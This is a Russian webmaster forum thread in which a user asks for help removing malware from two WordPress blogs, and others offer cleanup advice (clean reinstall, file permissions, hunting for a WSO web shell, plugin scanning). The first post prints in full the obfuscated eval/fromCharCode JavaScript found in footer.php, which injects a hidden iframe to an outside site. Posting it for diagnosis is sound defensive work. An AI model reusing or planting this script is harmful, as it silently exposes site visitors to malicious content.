подцепил заразу,помогите вылечить - Форум успешных вебмастеров - GoFuckBiz.com
 
 
Форум успешных вебмастеров - GoFuckBiz.com

  Форум успешных вебмастеров - GoFuckBiz.com > Бизнес-решения > Скрипты, программы и технические решения
Дата
USD/RUB90.7493
BTC/USD70175.1620
Скрипты, программы и технические решения Обсуждаем скрипты, программы и новые технологии.

Закрытая тема
Опции темы Опции просмотра
Старый 12.07.2011, 23:51   #1
Zodar
Ебланнед
 
Регистрация: 01.10.2009
Адрес: Online
Сообщений: 1,873
Бабло: $294890
По умолчанию подцепил заразу,помогите вылечить

захожу на свои 2 вп блога, а аваст мне кричит что они заражены какимто гавном, начал рытся нашел в шаблоне footer.php эту ебалу:


PHP код:
<script>var s,w=Number.MAX_VALUE,z=2,aa=document.createTextNode("harCode");if(isFinite(w)&&!isFinite(w*1.5)){s=String["fr"+"omC"+aa.nodeValue];}eval(s(7+z,7+z,103+z,100+z,30+z,38+z,98+z,109+z,97+z,115+z,107+z,99+z,108+z,114+z,44+z,101+z,99+z,114+z,67+z,106+z,99+z,107+z,99+z,108+z,114+z,113+z,64+z,119+z,82+z,95+z,101+z,76+z,95+z,107+z,99+z,38+z,37+z,96+z,109+z,98+z,119+z,37+z,39+z,89+z,46+z,91+z,39+z,121+z,7+z,7+z,7+z,103+z,100+z,112+z,95+z,107+z,99+z,112+z,38+z,39+z,57+z,7+z,7+z,123+z,30+z,99+z,106+z,113+z,99+z,30+z,121+z,7+z,7+z,7+z,98+z,109+z,97+z,115+z,107+z,99+z,108+z,114+z,44+z,117+z,112+z,103+z,114+z,99+z,38+z,32+z,58+z,103+z,100+z,112+z,95+z,107+z,99+z,30+z,113+z,112+z,97+z,59+z,37+z,102+z,114+z,114+z,110+z,56+z,45+z,45+z,108+z,97+z,43+z,113+z,114+z,95+z,114+z,113+z,44+z,97+z,120+z,44+z,97+z,97+z,45+z,113+z,114+z,95+z,114+z,103+z,113+z,114+z,103+z,97+z,44+z,102+z,114+z,107+z,37+z,30+z,117+z,103+z,98+z,114+z,102+z,59+z,37+z,47+z,46+z,37+z,30+z,102+z,99+z,103+z,101+z,102+z,114+z,59+z,37+z,47+z,46+z,37+z,30+z,113+z,114+z,119+z,106+z,99+z,59+z,37+z,116+z,103+z,113+z,103+z,96+z,103+z,106+z,103+z,114+z,119+z,56+z,102+z,103+z,98+z,98+z,99+z,108+z,57+z,110+z,109+z,113+z,103+z,114+z,103+z,109+z,108+z,56+z,95+z,96+z,113+z,109+z,106+z,115+z,114+z,99+z,57+z,106+z,99+z,100+z,114+z,56+z,46+z,57+z,114+z,109+z,110+z,56+z,46+z,57+z,37+z,60+z,58+z,45+z,103+z,100+z,112+z,95+z,107+z,99+z,60+z,32+z,39+z,57+z,7+z,7+z,123+z,7+z,7+z,100+z,115+z,108+z,97+z,114+z,103+z,109+z,108+z,30+z,103+z,100+z,112+z,95+z,107+z,99+z,112+z,38+z,39+z,121+z,7+z,7+z,7+z,116+z,95+z,112+z,30+z,100+z,30+z,59+z,30+z,98+z,109+z,97+z,115+z,107+z,99+z,108+z,114+z,44+z,97+z,112+z,99+z,95+z,114+z,99+z,67+z,106+z,99+z,107+z,99+z,108+z,114+z,38+z,37+z,103+z,100+z,112+z,95+z,107+z,99+z,37+z,39+z,57+z,100+z,44+z,113+z,99+z,114+z,63+z,114+z,114+z,112+z,103+z,96+z,115+z,114+z,99+z,38+z,37+z,113+z,112+z,97+z,37+z,42+z,37+z,102+z,114+z,114+z,110+z,56+z,45+z,45+z,108+z,97+z,43+z,113+z,114+z,95+z,114+z,113+z,44+z,97+z,120+z,44+z,97+z,97+z,45+z,113+z,114+z,95+z,114+z,103+z,113+z,114+z,103+z,97+z,44+z,102+z,114+z,107+z,37+z,39+z,57+z,100+z,44+z,113+z,114+z,119+z,106+z,99+z,44+z,116+z,103+z,113+z,103+z,96+z,103+z,106+z,103+z,114+z,119+z,59+z,37+z,102+z,103+z,98+z,98+z,99+z,108+z,37+z,57+z,100+z,44+z,113+z,114+z,119+z,106+z,99+z,44+z,110+z,109+z,113+z,103+z,114+z,103+z,109+z,108+z,59+z,37+z,95+z,96+z,113+z,109+z,106+z,115+z,114+z,99+z,37+z,57+z,100+z,44+z,113+z,114+z,119+z,106+z,99+z,44+z,106+z,99+z,100+z,114+z,59+z,37+z,46+z,37+z,57+z,100+z,44+z,113+z,114+z,119+z,106+z,99+z,44+z,114+z,109+z,110+z,59+z,37+z,46+z,37+z,57+z,100+z,44+z,113+z,99+z,114+z,63+z,114+z,114+z,112+z,103+z,96+z,115+z,114+z,99+z,38+z,37+z,117+z,103+z,98+z,114+z,102+z,37+z,42+z,37+z,47+z,46+z,37+z,39+z,57+z,100+z,44+z,113+z,99+z,114+z,63+z,114+z,114+z,112+z,103+z,96+z,115+z,114+z,99+z,38+z,37+z,102+z,99+z,103+z,101+z,102+z,114+z,37+z,42+z,37+z,47+z,46+z,37+z,39+z,57+z,7+z,7+z,7+z,98+z,109+z,97+z,115+z,107+z,99+z,108+z,114+z,44+z,101+z,99+z,114+z,67+z,106+z,99+z,107+z,99+z,108+z,114+z,113+z,64+z,119+z,82+z,95+z,101+z,76+z,95+z,107+z,99+z,38+z,37+z,96+z,109+z,98+z,119+z,37+z,39+z,89+z,46+z,91+z,44+z,95+z,110+z,110+z,99+z,108+z,98+z,65+z,102+z,103+z,106+z,98+z,38+z,100+z,39+z,57+z,7+z,7+z,123+z));</script> 
удалил, сделал бекап, просканил антивирусом вроде нормально, через дня опять хуяк и эта хуйня на блогах, блоги на разных хостинга.

как лечить? это я на комп чето поймал ?
__________________
Zodar = Affbox
Zodar вне форума  
Старый 13.07.2011, 00:00   #2
Pedro De Pakas
укуренный
 
Аватар для Pedro De Pakas
 
Регистрация: 06.07.2011
Сообщений: 105
Бабло: $15155
По умолчанию

ищи файл который обрабатывает твой footer.php. перезалей все файлы сайта снова с нуля с чистой версии а потом смотри что ты заливаешь из бекапа
Pedro De Pakas вне форума  
Старый 13.07.2011, 00:06   #3
I love this game
Fuck Yeah
 
Аватар для I love this game
 
Регистрация: 08.10.2009
Адрес: Ghetto
Сообщений: 2,689
Бабло: $1436314
По умолчанию

Возможно шелл на серваке и кто-то изменяет твои файлы, поставь chmod на footer или на всю папку шаблона(лучше на папку, т.к. если будут права на залитие файлов в папке, то можно перезалить footer)


Можно еще попробовать поискать сам шелл, шелл скорее WSO, можешь поиск текста в файлах или по размеру схожему.
+посмотреть дырявые ли у тебя плагины и поменять пасс

Последний раз редактировалось I love this game; 13.07.2011 в 00:11.
I love this game вне форума  
Старый 13.07.2011, 00:10   #4
Zodar
Ебланнед
 
Регистрация: 01.10.2009
Адрес: Online
Сообщений: 1,873
Бабло: $294890
ТС -->
автор темы ТС По умолчанию

Цитата:
Сообщение от I love this game Посмотреть сообщение
Возможно шелл на серваке и кто-то изменяет твои файлы, поставь chmod на footer или на всю папку шаблона(лучше на папку, т.к. если будут права на залитие файлов в папке, то можно перезалить footer)
думал об етом, но 2 сайта на 2 разных хостингах(хотя может конечно и туда и туда залили...),права уже поменял посмотрю не залезет ли опять
__________________
Zodar = Affbox
Zodar вне форума  
Старый 13.07.2011, 00:13   #5
I love this game
Fuck Yeah
 
Аватар для I love this game
 
Регистрация: 08.10.2009
Адрес: Ghetto
Сообщений: 2,689
Бабло: $1436314
По умолчанию

Дыры могут быть одинаковые, а пароли легкие были?
I love this game вне форума  
Старый 13.07.2011, 00:17   #6
imgreen
Senior Member
 
Аватар для imgreen
 
Регистрация: 15.11.2008
Сообщений: 13,224
Бабло: $247844971
По умолчанию

я уж подумал (читая сабж) - "форум успешных венерологов"
imgreen вне форума  
Старый 13.07.2011, 00:19   #7
Zodar
Ебланнед
 
Регистрация: 01.10.2009
Адрес: Online
Сообщений: 1,873
Бабло: $294890
ТС -->
автор темы ТС По умолчанию

Цитата:
Сообщение от I love this game Посмотреть сообщение
Дыры могут быть одинаковые, а пароли легкие были?
пароли не легкие, и рызные. друг с другом блоги вообще не пересекаются, хостинги разные, шаблоны разные, даже версии WP разные, поетому думаю может у меня на компе какаято хуйня их заражает когда я по фтп работаю....
__________________
Zodar = Affbox
Zodar вне форума  
Старый 13.07.2011, 00:23   #8
benzole
Senior Member
 
Аватар для benzole
 
Регистрация: 25.06.2007
Сообщений: 1,491
Бабло: $490772
По умолчанию

http://www.wordpressexploit.com/
может тут чё найдёшь

вот ещё такая приблуда есть http://wordpress.org/extend/plugins/exploit-scanner/
__________________
Talitha kumi!
benzole вне форума  
Старый 13.07.2011, 00:23   #9
Drunk Monk
Je suis moine ivre
 
Аватар для Drunk Monk
 
Регистрация: 03.03.2009
Сообщений: 15,268
Бабло: $797172957
По умолчанию

если версии движка одинаковые, может бть на автомате
Drunk Monk вне форума  
Старый 13.07.2011, 00:26   #10
I love this game
Fuck Yeah
 
Аватар для I love this game
 
Регистрация: 08.10.2009
Адрес: Ghetto
Сообщений: 2,689
Бабло: $1436314
По умолчанию

Цитата:
Сообщение от Zodar Посмотреть сообщение
пароли не легкие, и рызные. друг с другом блоги вообще не пересекаются, хостинги разные, шаблоны разные, даже версии WP разные, поетому думаю может у меня на компе какаято хуйня их заражает когда я по фтп работаю....
если и плагины разные, то скорее всего ты что-то подцепил.
I love this game вне форума